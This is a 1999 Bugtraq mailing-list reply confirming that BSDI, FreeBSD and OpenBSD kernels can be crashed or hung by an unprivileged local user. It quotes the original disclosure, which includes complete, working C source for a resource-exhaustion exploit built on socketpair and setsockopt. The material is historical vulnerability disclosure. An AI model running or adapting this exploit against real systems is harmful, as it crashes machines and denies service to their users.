[11702] in bugtraq
Re: Local DoS on network by unpriviledged user using setsockopt()
daemon@ATHENA.MIT.EDU (John N Dvorak)
Tue Sep 7 06:14:34 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.BSI.4.05.9909030945200.1431-100000@hq.capu.net>
Date: Fri, 3 Sep 1999 09:47:18 -0400
Reply-To: John N Dvorak <dvorak@CAPU.NET>
From: John N Dvorak <dvorak@CAPU.NET>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <19990901133104.A10623@ilse.nl>
Just Verified all versions of BSDI in my possession (2.1, 3.1, 4.0, 4.01)
are vulnerable. I do not have all the details, but the kernel panics.
System eventually reboots in 2.1.
Can be executed by any non-privileged user.
JD
On Wed, 1 Sep 1999, Sven Berkvens wrote:
>Recently, I mailed this mailing to a number of people who are concerned
>with security of various OSes, like FreeBSD, OpenBSD and NetBSD. The
>mailing was NOT intended to be made public, but somehow it was. Here is
>my original mailing:
>
>
>--- Forwarded ---
>
>I stumbled across a denial of service attack on FreeBSD systems, where
>an unpriviledged user can panic the kernel. Quick and dirty testing
>(code attached at the end of this mail) showed OpenBSD is vulnerable
>too:
>
>FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to
>test it on older FreeBSD versions.
>
>OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192:
>The kernel logs one "/bsd: mb_map full" and all processes trying to send
>something over the network get stuck waiting in mbuf. Locally the system
>continues to function. Tested by a friend.
>
>NetBSD: Not available, but it is highly probable that the affected code
>in OpenBSD is from its parent NetBSD.
>
>As far as I'm concerned, this can be handled quietly and without much
>haste. Knowledge of this problem is limited and there is absolutely no
>intention of publishing this exploit or messages to Bugtraq.
>
>With kind regards,
>Sven Berkvens (sven@ilse.nl)
>Long time FreeBSD-system administrator
>
>
>
>The source code for the program that causes this:
>
>#include <unistd.h>
>#include <sys/socket.h>
>#include <fcntl.h>
>
>#define BUFFERSIZE 204800
>
>extern int
>main(void)
>{
> int p[2], i;
> char crap[BUFFERSIZE];
>
> while (1)
> {
> if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
> break;
> i = BUFFERSIZE;
> setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> fcntl(p[0], F_SETFL, O_NONBLOCK);
> fcntl(p[1], F_SETFL, O_NONBLOCK);
> write(p[0], crap, BUFFERSIZE);
> write(p[1], crap, BUFFERSIZE);
> }
> exit(0);
>}
>
>----- End forwarded message -----
>
===========================================
John N Dvorak | dvorak@capu.net
Director of Technology
CapuNet, LLC - Corporate Internet Solutions
(301) 881-4900 x8018
===========================================
